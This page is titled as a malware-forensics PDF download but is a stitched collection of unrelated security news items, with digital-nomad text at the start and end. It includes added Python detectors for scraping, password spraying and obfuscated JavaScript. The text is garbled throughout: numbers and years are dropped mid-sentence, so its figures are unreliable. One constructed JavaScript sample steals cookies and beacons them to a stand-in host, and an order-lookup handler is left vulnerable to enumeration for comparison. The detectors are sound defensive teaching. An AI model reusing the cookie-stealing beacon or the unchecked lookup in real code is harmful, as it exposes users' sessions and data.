Malware forensics: investigating and analyzing malicious code pdf download
In addition to countries competing to serve and attract digital nomads, a number of well-financed startups such as Jobbatical, Remote, and Oyster are creating private-sector solutions to issues posed by people and companies going remote.

Cybersecurity researchers at Bitdefender say cyber criminals have been using a rootkit named FiveSys "that somehow made its way through the driver certification process to be digitally signed by Microsoft," reports ZDNet: The valid signature enables the rootkit — malicious software that allows cyber criminals to access and control infected computers — to appear valid, bypass operating system restrictions and gain what researchers describe as "virtually unlimited privileges".

"It's known for cyber criminals to use stolen digital certificates, but in this case, they've managed to acquire a valid one. It's still a mystery how cyber criminals were able to get hold of a valid certificate. While the digital signing requirements detect and stop most of the rootkits, they are not foolproof," Bogdan Botezatu, director of threat research and reporting at Bitdefender, told ZDNet. It's uncertain how FiveSys is actually distributed, but researchers believe that it's bundled with cracked software downloads.

Once installed, the FiveSys rootkit redirects internet traffic to a proxy server, which it does by installing a custom root certificate so that the browser won't warn about the unknown identity of the proxy. It also blocks other malware from writing to the drivers, in what's likely an attempt to stop other cyber criminals from taking advantage of the compromised system. Analysis of attacks shows that the FiveSys rootkit is being used in cyber attacks targeting online gamers, with the aim of stealing login credentials and hijacking in-game purchases.

The popularity of online games means that a lot of money can be involved — not only because banking details are connected to accounts, but also because prestigious virtual items can fetch large sums of money when sold, meaning attackers could exploit access to steal and sell these items.

Currently, the attacks are targeting gamers in China — which is where researchers also believe that the attackers are operating from.

According to court documents filed Friday, the man was identified as Alexander Alexandrovich Solonchenko, a resident of Kirovograd, Ukraine. Facebook alleges that Solonchenko abused a feature of the Facebook Messenger service called Contact Importer.

The feature allowed users to synchronize their phone address books and see which contacts had a Facebook account in order to allow users to reach out to their friends via Facebook Messenger.

Between January and September , Facebook said that Solonchenko used an automated tool to pose as Android devices in order to feed Facebook servers with millions of random phone numbers.

As Facebook's servers returned information on which phone numbers had an account on the site, Solonchenko collected the data, which he later offered for sale on December 1, , in a post on RaidForums, a notorious cybercrime forum and marketplace for stolen data. The article also notes that Facebook's court documents say Solonchenko scraped data from some of the largest companies in Ukraine, including its largest commercial bank and largest private delivery service.
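Detection logic for the enumeration pattern described above, added here as an illustration; it is not Facebook's code and is not drawn from the court filings. A genuine address-book sync uploads a modest number of phone numbers, most of which belong to real people who have accounts, so a large share of them match. A tool feeding random numbers uploads far more per client and almost none of them match. The log format, field names and thresholds are assumptions, and the sample log is constructed.

```python
from collections import defaultdict

# Constructed sample log (not real Facebook telemetry): one line per
# contact-import request, recording how many numbers the client uploaded
# and how many of them matched an existing account.
SAMPLE_LOG = """\
client=andro-7f3a uploaded=212 matched=140
client=andro-7f3a uploaded=198 matched=131
client=andro-9c01 uploaded=5000 matched=61
client=andro-9c01 uploaded=5000 matched=58
client=andro-9c01 uploaded=5000 matched=66
client=ios-2b44 uploaded=40 matched=35
"""


def parse_log(text):
    """Aggregate uploaded/matched counts and request counts per client."""
    totals = defaultdict(lambda: {"uploaded": 0, "matched": 0, "requests": 0})
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(item.split("=", 1) for item in line.split())
        rec = totals[fields["client"]]
        rec["uploaded"] += int(fields["uploaded"])
        rec["matched"] += int(fields["matched"])
        rec["requests"] += 1
    return dict(totals)


def flag_enumerators(totals, max_uploaded=1000, min_match_rate=0.25):
    """Flag clients that upload far more numbers than an address book holds
    and whose numbers rarely correspond to an account: a real phone book
    matches often, a random-number feed almost never does.

    Thresholds are assumed values for illustration.
    Returns {client: match_rate} for flagged clients."""
    flagged = {}
    for client, rec in totals.items():
        rate = rec["matched"] / rec["uploaded"] if rec["uploaded"] else 0.0
        if rec["uploaded"] > max_uploaded and rate < min_match_rate:
            flagged[client] = round(rate, 3)
    return flagged


if __name__ == "__main__":
    print(flag_enumerators(parse_log(SAMPLE_LOG)))
```

On the constructed sample only `andro-9c01` is flagged (15,000 numbers uploaded, match rate of about 1%). The match-rate test is what separates scraping from a large but genuine address book; a volume cap on its own would catch both.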

And the Record points out that he's not the only person known to have used this hole to scrape Facebook's user data and then sell it on the forum. Days after another incident in April involving leaked phone numbers of Facebook users, Facebook "revealed that it retired the Messenger Contact Importer feature back in September after it discovered Solonchenko and other threat actors abusing it."

An anonymous reader quotes a report from Motherboard: In the early hours of Sunday morning, hackers took down the corporate servers and systems of Sinclair Broadcast Group, a giant U.S. TV conglomerate that owns or operates more than channels across the country. Days later, inside the company, "it's pandemonium and chaos," as one current employee, who asked to remain anonymous as they were not authorized to speak to the press, told Motherboard. Sinclair has released very few details about the attack since it was hacked Sunday. On Wednesday, Bloomberg reported that the group behind the attack is the infamous Evil Corp., which was sanctioned by the U.S. Treasury Department. The ransomware attack interfered with several channels' broadcast programming, preventing them from airing ads or NFL games, as reported by The Record, a news site owned by cybersecurity firm Recorded Future.

It has also left employees confused and wondering what's going on, according to current Sinclair workers. Employees did not have access to their emails until Tuesday morning, according to the two employees and text messages seen by Motherboard. The office computers, however, are still locked by the company as a precaution, and Sinclair told employees not to log into their corporate VPN, which they usually used to do their jobs.

Until Thursday, the company was communicating with employees via text, according to the sources, who shared some of the texts sent by the company. In one of them, they called for an all-hands meeting. The meeting, according to the two current employees, was quick and vague. Both sources said that the company should be more transparent with its own employees.

But on one major U.S. exchange, the crash occurred during a massive sell-off on the Binance.US exchange around a.m. ET, Bloomberg reported. Binance is the largest cryptocurrency exchange in the world, and its Binance.US exchange is meant to be U.S.-compliant. According to a Binance.US spokesperson quoted by Bloomberg, the crash was due to an issue with a trading algorithm being run by one "institutional trader," which may indicate an investment fund of some sort.

Intel has open-sourced ControlFlag, a tool that uses machine learning to detect problems in computer code -- ideally to reduce the time required to debug apps and software.

From a report: In tests, the company's machine programming research team says that ControlFlag has found hundreds of defects in proprietary, "production-quality" software, demonstrating its usefulness. In addition, ControlFlag found dozens of novel anomalies in several high-quality open-source software repositories. After years of study, programmers learn to translate abstract ideas into concrete, executable programs -- but most spend the majority of their working hours not programming.

An anonymous reader shares a report from Reuters: The ransomware group REvil was itself hacked and forced offline this week by a multi-country operation, according to three private sector cyber experts working with the United States and one former official. Former partners and associates of the Russian-led criminal gang were responsible for a May cyberattack on the Colonial Pipeline that led to widespread gas shortages on the U.S. East Coast. REvil's direct victims include top meatpacker JBS. The crime group's "Happy Blog" website, which had been used to leak victim data and extort companies, is no longer available.

Officials said the Colonial attack used encryption software called DarkSide, which was developed by REvil associates. VMware head of cybersecurity strategy Tom Kellermann, who advises the U.S. Secret Service on cybercrime investigations, said law enforcement and intelligence personnel stopped the group from victimizing additional companies. The attack on software vendor Kaseya opened access to hundreds of Kaseya's customers all at once, leading to numerous emergency cyber incident response calls. Following the attack on Kaseya, the FBI obtained a universal decryption key that allowed those infected via Kaseya to recover their files without paying a ransom.

But law enforcement officials initially withheld the key for weeks as they quietly pursued REvil's staff, the FBI later acknowledged. According to three people familiar with the matter, law enforcement and intelligence cyber specialists were able to hack REvil's computer network infrastructure, obtaining control of at least some of their servers. After websites that the hacker group used to conduct business went offline in July, the main spokesman for the group, who calls himself "Unknown," vanished from the internet.

Vaughan-Nichols writes: This will be ugly. Or, as Stephen Williams, who uncovered the bug, put it, "I have a feeling that there will be some 'interesting moments' in the early morning when a bunch of the world's stratum 1 NTP servers using GPSD take the long strange trip back in time." Miller has acknowledged the problem, and a fix has been made to the code. So, what's the problem if the fix is already in? Well, there are two problems. First, it won't be backported to previous releases.
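The week-counter arithmetic behind this kind of time warp, as an added illustration that is not gpsd's code and does not reproduce the specific defect Miller fixed: a legacy GPS receiver reports the week as a 10-bit counter that wraps every 1024 weeks, so the software has to decide which 1024-week era the value belongs to. The hard-coded variant below freezes that decision when the code is written and, after the next wrap, silently returns dates exactly 1024 weeks in the past; the second variant resolves the era from a known lower bound on the date (such as the build date). The dates used are constructed, and the leap-second offset is assumed constant.

```python
from datetime import datetime, timedelta, timezone

GPS_EPOCH = datetime(1980, 1, 6, tzinfo=timezone.utc)
WEEK = timedelta(weeks=1)
ROLLOVER = 1024          # legacy 10-bit week counter wraps every 1024 weeks
LEAP_SECONDS = 18        # GPS minus UTC, assumed constant for this example


def week10_from_utc(utc):
    """What a legacy receiver reports: the full week number modulo 1024."""
    return ((utc - GPS_EPOCH) // WEEK) % ROLLOVER


def gps_to_utc_hardcoded(week10, tow, rollovers_at_build):
    """Bug pattern: the number of past rollovers is fixed when the code is
    written. Correct until the counter wraps again, then every result is
    exactly 1024 weeks in the past. tow is seconds into the week."""
    full_week = week10 + ROLLOVER * rollovers_at_build
    return GPS_EPOCH + full_week * WEEK + timedelta(seconds=tow - LEAP_SECONDS)


def gps_to_utc(week10, tow, not_before):
    """Resolve the era from a lower bound on the true date (for example the
    software's build date): take the smallest full week >= that bound."""
    bound_week = (not_before - GPS_EPOCH) // WEEK
    eras = max(0, -(-(bound_week - week10) // ROLLOVER))   # ceiling division
    full_week = week10 + ROLLOVER * eras
    return GPS_EPOCH + full_week * WEEK + timedelta(seconds=tow - LEAP_SECONDS)


def time_warp(week10, tow, not_before, rollovers_at_build):
    """How far the hard-coded variant is off, as a timedelta."""
    return gps_to_utc(week10, tow, not_before) - gps_to_utc_hardcoded(
        week10, tow, rollovers_at_build)


if __name__ == "__main__":
    # Constructed scenario: code built in early 2021 that assumed one
    # rollover (true between 1999 and 2019) is fed a fix from late 2021.
    now = datetime(2021, 10, 24, tzinfo=timezone.utc)
    build = datetime(2021, 1, 1, tzinfo=timezone.utc)
    w10 = week10_from_utc(now)
    print("receiver reports week", w10)
    print("resolved  :", gps_to_utc(w10, LEAP_SECONDS, build))
    print("hard-coded:", gps_to_utc_hardcoded(w10, LEAP_SECONDS, 1))
    print("warp      :", time_warp(w10, LEAP_SECONDS, build, 1))
```

The lower bound must itself be right: if the bound is later than the real date, the resolver lands 1024 weeks in the future instead, which is why the bound should come from something the build process controls rather than from the system clock it is about to set.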

If you're still using an older version, you may be out of luck. It's a legacy GPS problem. Or, as Miller noted, "This code is a week time warp waiting to happen." And if, like most of us, you're relying on someone upstream from you for the correct time, check with them to make sure they've taken care of this forthcoming trouble.

AMD and Microsoft have issued patches to address the slowdowns reported with Ryzen processors when Windows 11 launched. Engadget reports: The latest chipset driver addresses an issue that could have slowed down apps that are sensitive to CPU thread performance. Meanwhile, Microsoft is rolling out a software update tackling a bug that increased L3 cache latency. The issue impacted apps that need quick memory access, which in turn caused CPUs to slow down by up to 15 percent. The patch, delivered as a Windows 11 KB update, will be available starting today, but at the time of writing, a page containing instructions for installing it isn't yet live.

You should be able to install it via Windows Update too.

Almost two years after a wave of complaints flooded Google's support forums about YouTube accounts getting hijacked even if users had two-factor authentication enabled, Google's security team has finally tracked down the root cause of these attacks.

From a report: In a report published today, the Google Threat Analysis Group (TAG) attributed these incidents to "a group of hackers recruited in a Russian-speaking forum." YouTubers were typically lured with potential sponsorship deals. Victims were asked to install and test various applications and then publish a review. Apps typically used in these schemes involved antivirus software, VPN clients, music players, photo editors, PC optimizers, or online games.

But unbeknownst to the targets, the hackers hid malware inside the apps. Once the YouTube creators received and installed the demo app, the installer would drop malware on their devices, malware which would extract login credentials and authentication cookies from their browsers and send the stolen data to a remote server. The hackers would then use the authentication cookies to access a YouTuber's account -- bypassing the need to enter a two-factor authentication (2FA) token -- and move to change passwords and the account's recovery email and phone numbers.

With the victims locked out of their accounts, the hackers would typically sell the hijacked YouTube channel on underground marketplaces for stolen identities.

Missouri Gov. Mike Parson escalated his war with the St. Louis Post-Dispatch on Wednesday when his political operation published a video doubling down on his attack against a reporter who informed the state that a state website revealed teachers' Social Security numbers.

From a report: The video is produced by Uniting Missouri, a political action committee created by Parson supporters to back his election campaign. The PAC continues to raise and spend large sums of money to promote Parson's political agenda. It operates without direct input from Parson on its activities.

"The St. Louis Post-Dispatch is purely playing politics," the ad states. John Hancock, chairman of Uniting Missouri, declined to discuss any specifics about the video.

Google today released Chrome v95, the latest version of its popular web browser and a version that contains several changes that will likely cause problems for a considerable part of its users.

A weekend cyberattack against Sinclair Broadcast Group was linked to one of the most infamous Russian cybergangs, called Evil Corp, Bloomberg reports.

From the report: The Sinclair hackers used malware called Macaw, a variant of ransomware known as WastedLocker. Evil Corp. was sanctioned by the U.S. Treasury Department. Since then, it has been accused by cybersecurity experts of rebranding in an attempt to avoid the sanctions.

People in the U.S.

An anonymous reader quotes a report from Engadget: Under Acting Chairwoman Jessica Rosenworcel, the Federal Communications Commission is seeking to create new rules targeting spam text messages.

Like another recent proposed rulemaking from the agency, the policy would push wireless carriers and telephone companies to block the spam before it ever gets to your phone.

Akamai researchers have analyzed 10, JavaScript samples including malware droppers, phishing pages, scamming tools, Magecart snippets, cryptominers, etc. BleepingComputer reports: Obfuscation is when easy-to-understand source code is converted into hard-to-understand, confusing code that still operates as intended. Threat actors commonly use obfuscation to make it harder to analyze malicious scripts and to bypass security software.

Obfuscation can be achieved through various means, like the injection of unused code into a script, the splitting and concatenating of the code (breaking it into unconnected chunks), or the use of hexadecimal patterns and tricky overlaps with function and variable naming. But not all obfuscation is malicious or tricky. As the report explains, about 0. As such, detecting malicious code based on the fact that it is obfuscated isn't enough on its own, and further correlation with malicious functionality needs to be made.
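An added example of the "obfuscation plus functionality" correlation the report calls for; this is illustrative code, not Akamai's tooling. It scores a script on obfuscation markers (hex escapes, `_0x` identifiers, split-and-concatenated strings, `String.fromCharCode`, `unescape`) separately from capability markers (dynamic code execution, cookie access, an outbound beacon, base64 encoding), and only calls a sample malicious when both are present. The three samples are constructed, and the patterns and thresholds are assumptions a real scanner would tune against a corpus.

```python
import re

# Constructed samples (not from Akamai's corpus). The first two share the
# same obfuscation tricks; only the second has the capabilities of a stealer.
BENIGN_OBFUSCATED = r"""
var _0x1a2b=["\x63\x6c\x69\x63\x6b","\x74\x68\x65\x6d\x65"];
document.body.addEventListener(_0x1a2b[0],function(){
  document.body.classList.toggle(_0x1a2b[1]);});
"""
MALICIOUS_OBFUSCATED = r"""
var _0xab=["\x63\x6f\x6f\x6b\x69\x65","\x68\x74\x74\x70\x73\x3a\x2f\x2f"];
var f="ev"+"al";
(function(){var c=document[_0xab[0]];
  new Image().src=_0xab[1]+"c2.example"+"/?d="+btoa(c);})();
window[f](unescape("%61%6c%65%72%74")+String.fromCharCode(40,49,41));
"""
PLAIN = "function add(a,b){return a+b;}"

# Markers of obfuscation: common in packed but legitimate code too.
OBFUSCATION = {
    "hex_escape":   re.compile(r"\\x[0-9a-fA-F]{2}"),
    "hex_ident":    re.compile(r"\b_0x[0-9a-fA-F]+\b"),
    "split_concat": re.compile(r'"[^"]{1,3}"\s*\+\s*"[^"]{1,3}"'),
    "char_code":    re.compile(r"String\.fromCharCode\s*\("),
    "unescape":     re.compile(r"\bunescape\s*\("),
}
# Markers of capability: what the script can do once it runs.
CAPABILITY = {
    "dynamic_eval":  re.compile(r"\beval\s*\(|\bFunction\s*\(|window\s*\[\s*\w+\s*\]\s*\("),
    "cookie_access": re.compile(r"document\.cookie|document\s*\[\s*_0x"),
    "exfil_beacon":  re.compile(r"new\s+Image\s*\(\s*\)\s*\.src\s*=|\bfetch\s*\(|XMLHttpRequest|sendBeacon"),
    "base64":        re.compile(r"\b(?:btoa|atob)\s*\("),
}


def indicators(src, patterns):
    """Names of the patterns that match anywhere in src, sorted."""
    return sorted(name for name, rx in patterns.items() if rx.search(src))


def analyze(src, min_obf=2, min_cap=2):
    """Correlate the two marker sets. Obfuscation alone yields
    'obfuscated-benign'; obfuscation together with enough capability
    markers yields 'malicious'. Thresholds are assumed values."""
    obf = indicators(src, OBFUSCATION)
    cap = indicators(src, CAPABILITY)
    if len(obf) >= min_obf and len(cap) >= min_cap:
        verdict = "malicious"
    elif len(obf) >= min_obf:
        verdict = "obfuscated-benign"
    else:
        verdict = "clean"
    return {"obfuscation": obf, "capabilities": cap, "verdict": verdict}


if __name__ == "__main__":
    for name, src in [("plain", PLAIN), ("benign", BENIGN_OBFUSCATED),
                      ("malicious", MALICIOUS_OBFUSCATED)]:
        print(name, analyze(src))
```

The benign sample trips two obfuscation markers and none of the capability markers, so a detector keyed on obfuscation alone would have flagged it; the malicious sample trips both sets, with the cookie read and the image beacon being the pair that actually describes a stealer. Regex markers like these are a triage filter, not a verdict: a script can reach `document.cookie` through a property name it decodes at runtime, which only emulation or instrumentation would see.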

This mixing with legitimate deployment is precisely what makes the detection of risky code challenging, and the reason why obfuscation is becoming so widespread in the threat landscape.

A hacker has breached the Argentinian government's IT network and stolen ID card details for the country's entire population, data that is now being sold in private circles.

From a report: The agency is a crucial cog inside the Argentinian Interior Ministry, where it is tasked with issuing national ID cards to all citizens, data that it also stores in digital format as a database accessible to other government agencies, acting as a backbone for most government queries for citizens' personal information.

The attack requires setting up a replica of the target ATM, because training the algorithm for the specific dimensions and key spacing of the different PIN pads is crucially important.

Next, the machine-learning model is trained to recognize pad presses and assign specific probabilities to a set of guesses, using video of people typing PINs on the ATM pad. For the experiment, the researchers collected 5, videos of 58 different people of diverse demographics entering 4-digit and 5-digit PINs. The model can exclude keys based on the coverage of the non-typing hand, and deduces the pressed digits from the movements of the other hand by evaluating the topological distance between two keys.

The placement of the camera which captures the attempts plays a key role, especially if recording left- or right-handed individuals.

Boombox lets Tesla owners add custom horn and pedestrian warning sounds to the vehicle. Tesla owners will now be able to warn potential vandals more explicitly by giving them verbal warnings from a remote location. In a tweet Wednesday, Elon Musk joked the feature was also "great for practical jokes."

According to a post on the Signal blog, a federal grand jury in the Central District of California has subpoenaed Signal for a whole pile of user data, like subscriber information, financial information, transaction histories, communications, and more.

HotHardware reports: The thing is, the subpoena is moot: Signal simply doesn't have the data to provide. The company can't provide any of the data that the grand jury is asking for because, as the company itself notes, "Signal doesn't have access to your messages, your chat list, your groups, your contacts, your stickers, [or] your profile name or avatar." The announcement and, we suppose, this news post essentially amount to an advertisement for Signal, but it's an amusing -- or possibly distressing -- anecdote nonetheless.

While Signal is secure, keep in mind that the messages still originate from your device, which means that other apps on your device like, say, your keyboard could still be leaking your data. Lest you doubt Signal's story, the app creators have published the subpoena, suitably redacted, on their blog.

Hive, a ransomware group that has hit over 30 organizations since June , now also encrypts Linux and FreeBSD using new malware variants specifically developed to target these platforms.

BleepingComputer reports: However, as Slovak internet security firm ESET discovered, Hive's new encryptors are still in development and still lack functionality. The Linux variant also proved to be quite buggy during ESET's analysis, with the encryption completely failing when the malware was executed with an explicit path. It also comes with support for a single command line parameter, -no-wipe. In contrast, Hive's Windows ransomware comes with up to 5 execution options, including killing processes and skipping disk cleaning, uninteresting files, and older files.

The ransomware's Linux version also fails to trigger the encryption if executed without root privileges, because it attempts to drop the ransom note on compromised devices' root file systems.

An anonymous reader quotes a report from Motherboard: So far this year, almost 1, schools across the country have suffered from a ransomware attack, and in some cases had classes disrupted because of it, according to tallies by Emsisoft, a cybersecurity company that specializes in tracking and investigating ransomware attacks, and another cybersecurity firm, Recorded Future.

Brett Callow, a researcher at Emsisoft, shared the list with Motherboard. It includes 73 school districts, comprising schools. Callow said that it's very likely there are some schools missing from the list, meaning the total number of victims is likely higher. The list includes schools such as the Mesquite Independent School District in Texas, which comprises 49 different schools; the Haverhill Public Schools in Massachusetts, which comprises 16 schools; and the Visalia Unified School District in California, which comprises 41 schools.

"While most ransomware attacks are not targeted, there are two sectors that ransomware groups do seem to enjoy going after: healthcare and schools," Liska said. Schools pay significantly less in average ransom than most sectors (when they pay, which is rare), so the ransomware groups are not going after schools for the money.

An anonymous reader quotes a report from KrebsOnSecurity: In December , bling vendor Signet Jewelers fixed a weakness in their Kay Jewelers and Jared websites that exposed the order information for all of their online customers. This week, Signet subsidiary Zales.com turned out to have the same kind of weakness. Last week, KrebsOnSecurity heard from a reader who was browsing Zales.com.

The reader noticed that the link for the order information she'd stumbled on included a lengthy numeric combination that -- when altered -- would produce yet another customer's order information.

When the reader failed to get an immediate response from Signet, KrebsOnSecurity contacted the company. In a written response, Signet said, "A concern was brought to our attention by an IT professional. We addressed it swiftly, and upon review we found no misuse or negative impact to any systems or customer data.

As a result, we exceed industry benchmarks on data protection maturity. We always appreciate it when consumers reach out to us with feedback, and have committed to further our efforts on data protection maturity." That would be a pretty convincing scam. Or just targeted phishing attacks.

A security bug in the health app Docket exposed the private information of residents vaccinated against COVID in New Jersey and Utah, where the app received endorsements from state officials.

From a report: Docket lets residents download and carry a digital copy of their immunizations by pulling their vaccination records from their state's health authority. The digital copy has the same information as the COVID paper card, but is digitally signed by the state to prevent forgeries.

Docket is one of several so-called vaccine passports in the U.S. But for a time, the app allowed anyone access to the QR codes of other vaccinated users -- and all the personal and vaccine information encoded within. That included names, dates of birth and information about a person's COVID vaccination status, such as which type of vaccine they received and when.

TechCrunch discovered the bug on Tuesday and immediately contacted the company. Docket chief executive Michael Perretta said the bug was fixed at the server level a few hours later. The bug was found in how the Docket app requests the user's QR code from its servers. The user's QR code is generated on the server in the form of a SMART Health Card, a widely accepted standard for validating a person's vaccination status across the world.
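The Zales order link and the Docket QR-code request described above are the same class of bug: an endpoint that looks up a record by an identifier the client supplies (an order number, a user ID) and never checks that the record belongs to the caller. The following is an added illustration of the flaw beside its fix; it is not Signet's or Docket's code, the store and handler names are assumptions, and the data is constructed.

```python
import secrets

# Constructed data store standing in for a back-end database.
ORDERS = {
    10001: {"customer": "alice", "items": ["ring"], "ship_to": "1 Main St"},
    10002: {"customer": "bob", "items": ["watch"], "ship_to": "2 Oak Ave"},
    10003: {"customer": "carol", "items": ["pendant"], "ship_to": "3 Elm Rd"},
}


class Forbidden(Exception):
    """Raised for both 'no such record' and 'not your record'."""


def get_order_vulnerable(order_id):
    """The flaw: the number from the URL is the only thing consulted.
    Anyone can step through neighbouring IDs and read every order."""
    return ORDERS[order_id]


def get_order_hardened(session_user, order_id):
    """Object-level authorization: the record must belong to the
    authenticated caller. Missing and foreign records produce the same
    error so the endpoint does not confirm which IDs exist."""
    order = ORDERS.get(order_id)
    if order is None or order["customer"] != session_user:
        raise Forbidden("no such order")
    return order


# For links that must work without a login (an order-status link in an
# e-mail, a shareable pass), replace the guessable number with an opaque,
# high-entropy token that maps back to the record server-side.
LINK_TOKENS = {}


def issue_link_token(order_id):
    token = secrets.token_urlsafe(32)   # 256 bits of entropy: not enumerable
    LINK_TOKENS[token] = order_id
    return token


def get_order_by_token(token):
    order_id = LINK_TOKENS.get(token)
    if order_id is None:
        raise Forbidden("no such order")
    return ORDERS[order_id]


def walk_ids(handler, first, count):
    """Simulate what the reader did: alter the number in the link and see
    what comes back. Returns the customer names the handler leaked."""
    leaked = []
    for order_id in range(first, first + count):
        try:
            leaked.append(handler(order_id)["customer"])
        except (KeyError, Forbidden):
            pass
    return leaked


def lookup_fails(handler, *args):
    """True if the handler refuses the request (fail-closed check)."""
    try:
        handler(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable leaks:", walk_ids(get_order_vulnerable, 10001, 3))
    print("hardened (as alice):",
          walk_ids(lambda i: get_order_hardened("alice", i), 10001, 3))
```

Hiding the ID from the UI, as Docket's app did, is not a control: anyone who proxies the app's traffic sees it. The check has to live where the record is served, which is why the fix was made on the server.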

That QR code is tied to a user ID, which isn't visible from the app but can be viewed by looking at its network traffic using off-the-shelf software like Burp Suite or Charles Proxy.

Iran's president said Wednesday that a cyberattack which paralyzed every gas station in the Islamic Republic was designed to get "people angry by creating disorder and disruption," as long lines still snaked around the pumps a day after the incident began.

NPR reports: Ebrahim Raisi's remarks stopped short of assigning blame for the attack, which rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump. However, his remarks suggested that he and others in the theocracy believe anti-Iranian forces carried out the assault. No group has claimed responsibility for the attack that began Tuesday, though it bore similarities to another months earlier that seemed to directly challenge Iran's Supreme Leader Ayatollah Ali Khamenei as the country's economy buckles under American sanctions.

Associated Press journalists saw long lines at multiple gas stations in Tehran. One station had a line of 90 cars waiting for fuel. Those buying ended up having to pay at higher, unsubsidized prices. Tuesday's attack rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump.

The semiofficial ISNA news agency, which first called the incident a cyberattack, said it saw those trying to buy fuel with a government-issued card through the machines instead receiving a message reading "cyberattack". ISNA later removed its reports, claiming that it too had been hacked.

Such claims of hacking can come quickly when Iranian outlets publish news that angers the theocracy.

From a report: The attack on the Ethereum-based lending protocol was first reported by The Block Crypto, which cited a tweet by PeckShield highlighting a large flash-loan transaction that carried out the theft. The burgeoning DeFi landscape has drawn in billions of dollars in investor funds, but it has been a frequent target for hackers, with many using flash loans -- a type of uncollateralized lending -- as a way to exploit poorly protected protocols.

From a report: The organization's name was listed on a dark web portal, often called a "leak site," where the Grief gang typically lists companies they infected and which haven't paid their ransom demands.

It remains unclear if the Grief gang hit one of the NRA's smaller branches or if the attack hit the organization's central network. Ransomware gangs often like to exaggerate their attacks.

An anonymous reader quotes a report from KrebsOnSecurity: U.S. federal investigators today searched a PAX warehouse in Jacksonville, Fla. KrebsOnSecurity has learned the raid is tied to reports that PAX's systems may have been involved in cyberattacks. In an official statement, investigators told WOKV only that they were executing a court-authorized search at the warehouse as part of a federal investigation, and that the inquiry included the Department of Customs and Border Protection and the Naval Crimin Investigative Service (NCIS).

According to a source, the payment processor found that the PAX terminals were being used both as a malware "dropper" -- a repository for malicious files -- and as "command-and-control" locations for staging attacks and collecting information.

The source said two major financial providers -- one in the United States and one in the United Kingdom -- had already begun pulling PAX terminals from their payment infrastructure, a claim that was verified by two different sources. The source was unable to share specific details about the strange network activity that prompted the FBI's investigation. But it should be noted that point-of-sale terminals and the technology that supports them are perennial targets of cybercriminals.

An indie developer has made an interesting observation: though only a small share of his game's buyers run Linux, they filed a disproportionate share of the bug reports. Not because the Linux platform was buggier, either. Only 3 of the bug reports submitted by Linux users were platform specific, that is, would only happen on Linux. Koderski also says that very few of those bugs were specific to Linux. Multiple commenters on the post chalked this up to the kind of people who use Linux: software professionals, IT employees, and engineers who would already be familiar with official bug reporting processes.

It's a strong theory as to why this might be, though the sheer passion that the gaming-on-Linux community has for anyone who supports their favorite hobby may be another.

Microsoft said on Monday that a Russian state-sponsored hacking group known as Nobelium had attacked more than IT and cloud services providers, successfully breaching 14 companies.

The attacks included spear-phishing campaigns and password-spraying operations that targeted employees of companies that manage IT and cloud infrastructure on behalf of their clients.
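Detection logic for the password-spraying pattern mentioned above, added here as an illustration; it is not Microsoft's detection and is not from the report. Spraying tries one or two passwords against many accounts from one source, so the signal is many distinct usernames from one IP in a short window with few attempts per account, which a per-account lockout never triggers on; a success at the tail of such a run is the alert that matters. The log format, window and thresholds are assumptions, and the log lines are constructed.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed authentication log (not real telemetry), one line per login
# attempt. 203.0.113.7 sprays seven accounts once each and gets into the
# last; 198.51.100.9 hammers a single account; 192.0.2.20 is a user who
# mistyped once.
SAMPLE_AUTH_LOG = """\
2021-10-25T08:00:01Z src=203.0.113.7 user=alice result=FAIL
2021-10-25T08:00:09Z src=203.0.113.7 user=bob result=FAIL
2021-10-25T08:00:15Z src=198.51.100.9 user=admin result=FAIL
2021-10-25T08:00:17Z src=203.0.113.7 user=carol result=FAIL
2021-10-25T08:00:20Z src=192.0.2.20 user=dave result=FAIL
2021-10-25T08:00:26Z src=203.0.113.7 user=erin result=FAIL
2021-10-25T08:00:31Z src=198.51.100.9 user=admin result=FAIL
2021-10-25T08:00:34Z src=203.0.113.7 user=frank result=FAIL
2021-10-25T08:00:40Z src=192.0.2.20 user=dave result=SUCCESS
2021-10-25T08:00:42Z src=203.0.113.7 user=grace result=FAIL
2021-10-25T08:00:47Z src=198.51.100.9 user=admin result=FAIL
2021-10-25T08:00:51Z src=203.0.113.7 user=heidi result=SUCCESS
2021-10-25T08:01:03Z src=198.51.100.9 user=admin result=FAIL
2021-10-25T08:01:19Z src=198.51.100.9 user=admin result=FAIL
"""


def parse_auth_log(text):
    """Parse 'timestamp key=value ...' lines into dicts with a datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *rest = line.split()
        fields = dict(item.split("=", 1) for item in rest)
        fields["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        events.append(fields)
    return events


def detect_password_spray(events, window=timedelta(minutes=15),
                          min_users=5, max_per_user=2):
    """For each source, slide a window over its attempts and alert when the
    window holds at least min_users distinct accounts with no account tried
    more than max_per_user times. Returns {src: details} for the widest
    qualifying window per source. Thresholds are assumed values."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        for i, last in enumerate(evs):
            in_window = [e for e in evs[: i + 1] if e["ts"] > last["ts"] - window]
            per_user = Counter(e["user"] for e in in_window)
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                alerts[src] = {
                    "distinct_users": len(per_user),
                    "attempts": len(in_window),
                    "window_end": last["ts"],
                    "compromised": sorted(
                        e["user"] for e in in_window if e["result"] == "SUCCESS"),
                }
    return alerts


if __name__ == "__main__":
    for src, details in detect_password_spray(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(src, details)
```

On the sample only `203.0.113.7` alerts, with `heidi` listed as the account it got into; the single-account brute force from `198.51.100.9` is a different rule (many failures, one user) and is deliberately not matched here. Sprays that rotate source IPs defeat a per-IP grouping, so a production version would also group by user-agent string, ASN or the tenant being targeted.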

Digital nomads' growing numbers and financial clout have caused dozens of tourist-starved countries to update their travel policies for borderless workers. In Summer , a handful of nations launched visa programs to attract digital nomads, starting with Estonia in June , then Barbados, Bermuda, Costa Rica, Anguilla, Antigua, and later most of Eastern Europe.

Sweetheart deals like income tax breaks, subsidized housing, and free multiple entry have become as popular as employee work benefits.

